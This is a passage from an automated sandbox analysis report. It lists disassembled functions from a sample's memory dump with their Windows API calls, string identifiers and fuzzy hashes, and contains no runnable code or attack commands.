                                                                            • Instruction Fuzzy Hash: 5001B171A41108ABDF15EBA4CD52AFE77A8FF15341F10002ABD15F72D1DE245A0CD672
                                                                            APIs
                                                                              • Part of subcall function 00807DE1: _memmove.LIBCMT ref: 00807E22
                                                                              • Part of subcall function 0085AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0085AABC
                                                                            • SendMessageW.USER32(?,00000182,?,00000000), ref: 00858DEE
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: ClassMessageNameSend_memmove
                                                                            • String ID: ComboBox$ListBox
                                                                            • API String ID: 372448540-1403004172
                                                                            • Opcode ID: 2e8650f8c1011a5b840d2ee2ba91a2e2da65c7b1cc553565f5f3def84da2eb31
                                                                            • Instruction ID: edeb968316e95ccc5a150f745f1d15e6416d3ea101c20bbe823064bf329e0a22
                                                                            • Opcode Fuzzy Hash: 2e8650f8c1011a5b840d2ee2ba91a2e2da65c7b1cc553565f5f3def84da2eb31
                                                                            • Instruction Fuzzy Hash: 77018F71A41109ABDB15EAA8CD82AFE77A8FB11301F100126BC15F32D2DA255E0CD672
                                                                            APIs
                                                                              • Part of subcall function 008299AC: __getptd_noexit.LIBCMT ref: 008299AD
                                                                            • __lock.LIBCMT ref: 00829443
                                                                            • _free.LIBCMT ref: 00829470
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: __getptd_noexit__lock_free
                                                                            • String ID: x
                                                                            • API String ID: 1533244847-2890206012
                                                                            • Opcode ID: 6c6d72cf12556efc54ff50dfb64d822318f6f799966fbfb337d582854c12c175
                                                                            • Instruction ID: a63d9cb233d71a325c66457ae47beffd900ac1ce029016ae55a78e9318f1493d
                                                                            • Opcode Fuzzy Hash: 6c6d72cf12556efc54ff50dfb64d822318f6f799966fbfb337d582854c12c175
                                                                            • Instruction Fuzzy Hash: 6B110031D016359BCB21BF69A401699B7A0FB45B20F15422AE8D4E7290C73459C2CBCA
                                                                            APIs
                                                                              • Part of subcall function 00802612: GetWindowLongW.USER32(?,000000EB), ref: 00802623
                                                                            • DefDlgProcW.USER32(?,0000002B,?,?,?,?,?,?,?,0083B93A,?,?,?), ref: 0088C5F1
                                                                              • Part of subcall function 008025DB: GetWindowLongW.USER32(?,000000EB), ref: 008025EC
                                                                            • SendMessageW.USER32(?,00000401,00000000,00000000), ref: 0088C5D7
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: LongWindow$MessageProcSend
                                                                            • String ID: S
                                                                            • API String ID: 982171247-2858979982
                                                                            • Opcode ID: 92ccd801c578d1481dff982ca145c89a4eaa4be4a3a11fa033776c83eded9c4a
                                                                            • Instruction ID: c1b9238908dc3ffde72391400fbc2b14d37b2aabd376513ca03bf27deae98529
                                                                            • Opcode Fuzzy Hash: 92ccd801c578d1481dff982ca145c89a4eaa4be4a3a11fa033776c83eded9c4a
                                                                            • Instruction Fuzzy Hash: 5101B531200604ABCF25AF18CC58E6B3BB6FF85764F140128FA519B2E1CB71B851DB61
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: ClassName_wcscmp
                                                                            • String ID: #32770
                                                                            • API String ID: 2292705959-463685578
                                                                            • Opcode ID: 72df19c92063555bfc75f9bdc3637129d8e829694ceda0b1a8fe24e33ac9db10
                                                                            • Instruction ID: 394378f56aced29eb3deedefa220b85e4f4d91fbbf3c6f77dcf07d96c6bba294
                                                                            • Opcode Fuzzy Hash: 72df19c92063555bfc75f9bdc3637129d8e829694ceda0b1a8fe24e33ac9db10
                                                                            • Instruction Fuzzy Hash: A8E0D8326002386BE720AB99AC49FA7F7ACFB55B70F110067FD04D3151E970AA55CBE1
                                                                            APIs
                                                                              • Part of subcall function 0083B314: _memset.LIBCMT ref: 0083B321
                                                                              • Part of subcall function 00820940: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,0083B2F0,?,?,?,0080100A), ref: 00820945
                                                                            • IsDebuggerPresent.KERNEL32(?,?,?,0080100A), ref: 0083B2F4
                                                                            • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,0080100A), ref: 0083B303
                                                                            Strings
                                                                            • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 0083B2FE
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
                                                                            • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                            • API String ID: 3158253471-631824599
                                                                            • Opcode ID: 08a7f7f38d06424827b909911407464b84e69f28d59d7b6b0fd7e879ff1fe70e
                                                                            • Instruction ID: f60e9e34e428cd3605b796f1d2e423cd8d998e84c9b6fa09494f00444163a086
                                                                            • Opcode Fuzzy Hash: 08a7f7f38d06424827b909911407464b84e69f28d59d7b6b0fd7e879ff1fe70e
                                                                            • Instruction Fuzzy Hash: 53E06DB02007218BE760EF6CE8047427AE4FF40304F00892CE656C7742EBB4E488CBA1
                                                                            APIs
                                                                            • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 008859AE
                                                                            • PostMessageW.USER32(00000000), ref: 008859B5
                                                                              • Part of subcall function 00865244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 008652BC
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: FindMessagePostSleepWindow
                                                                            • String ID: Shell_TrayWnd
                                                                            • API String ID: 529655941-2988720461
                                                                            • Opcode ID: 7cdb5b18e65eec6e3d252d7d169bb26fe30aa7207673c262dfee646c29d8ba39
                                                                            • Instruction ID: cd49a699953ea6f08209209bcaa5fd7e877a2ee0ceba2943a063f07a9da2a45b
                                                                            • Opcode Fuzzy Hash: 7cdb5b18e65eec6e3d252d7d169bb26fe30aa7207673c262dfee646c29d8ba39
                                                                            • Instruction Fuzzy Hash: 9AD0C931380311BAE6A4BB74DC0BFD76614FB14B50F010825B355EA2D1D9E4A800CB54
                                                                            APIs
                                                                            • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0088596E
                                                                            • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00885981
                                                                              • Part of subcall function 00865244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 008652BC
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: FindMessagePostSleepWindow
                                                                            • String ID: Shell_TrayWnd
                                                                            • API String ID: 529655941-2988720461
                                                                            • Opcode ID: bd08d4642b8e729353fe22367c80256f2708fd50546625b52efa7250f7191301
                                                                            • Instruction ID: 0212e04a047e314a3e190338392c3cf6bb2ddc0ba099a2a30cbd636c089ff491
                                                                            • Opcode Fuzzy Hash: bd08d4642b8e729353fe22367c80256f2708fd50546625b52efa7250f7191301
                                                                            • Instruction Fuzzy Hash: 06D0C931384311B6E6A4BB74DC1BFD76A14FB10B50F010825B359EA2D1D9E4A800CB54